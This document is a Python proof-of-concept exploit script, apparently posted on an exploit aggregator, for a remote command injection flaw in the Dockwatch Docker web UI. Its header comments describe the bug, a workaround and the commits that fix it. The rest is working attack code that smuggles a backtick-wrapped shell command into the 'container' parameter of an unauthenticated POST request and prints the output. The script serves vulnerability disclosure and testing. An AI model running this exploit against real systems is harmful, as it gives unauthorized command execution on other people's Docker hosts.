## https://sploitus.com/exploit?id=1337DAY-ID-39751
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
#
# dockexec.py
#
# Dockwatch Remote Command Execution
#
# Jeremy Brown [jbrown3264/gmail] / Sept 2024
#
# Intro
#
# Dockwatch is a container management web UI for docker. It runs by default
# without authentication, although guidance is available for how to setup
# credentials for access. It has a Commands feature that allows a user to
# run docker commands such as inspect, network, ps. Prior to fix, it did not
# restrict input for parameters, so both 'container' and 'parameters' for the
# 'dockerInspect' command were vulnerable to shell command injection on the
# container as the 'abc'user with (limited) command output.
#
# Example
#
# $ ./dockexec.py http://host:9999 "id"
# uid=1001(abc)
# gid=131(abc)
# groups=131(abc),281(unraiddocker),1000(users)
#
# Workaround: echo "admin:[a-FANTASTIC-password]" > /config/logins
# * DO NOT DO THIS: echo "" > /config/logins (* unless you want spacebar to work for user/pass)
#
# Fix: see commits 23df366 and c091e4c, kudos for maintainers for quick fixes
#
import sys
import requests
import re
def clean_output(output):
output = output.replace('[]', '')
output = re.sub(r'Error: No such object:\s*', '', output)
output = output.replace('command', '')
output = output.replace('test\n', '')
lines = [line.strip() for line in output.split('\n')]
return '\n'.join(lines)
def send_command(url, command):
endpoint = f"{url}/ajax/commands.php"
data = {
'm': 'runCommand',
'command': 'dockerInspect',
'container': '`' + command + '`',
'parameters': 'test', # also affected
'servers': '0'
}
try:
response = requests.post(endpoint, data=data)
response.raise_for_status()
match = re.search(r'<pre[^>]*>(.*?)</pre>', response.text, re.DOTALL)
if match:
output = clean_output(match.group(1))
if output:
print("%s" % output)
else:
print("No output found.")
else:
print("No output found in the response.")
except requests.exceptions.RequestException as error:
print("An error occurred: %s" % error)
if __name__ == "__main__":
if len(sys.argv) != 3:
print("Usage: %s <url> <command>" % sys.argv[0])
sys.exit(1)
url = sys.argv[1]
command = sys.argv[2]
send_command(url, command)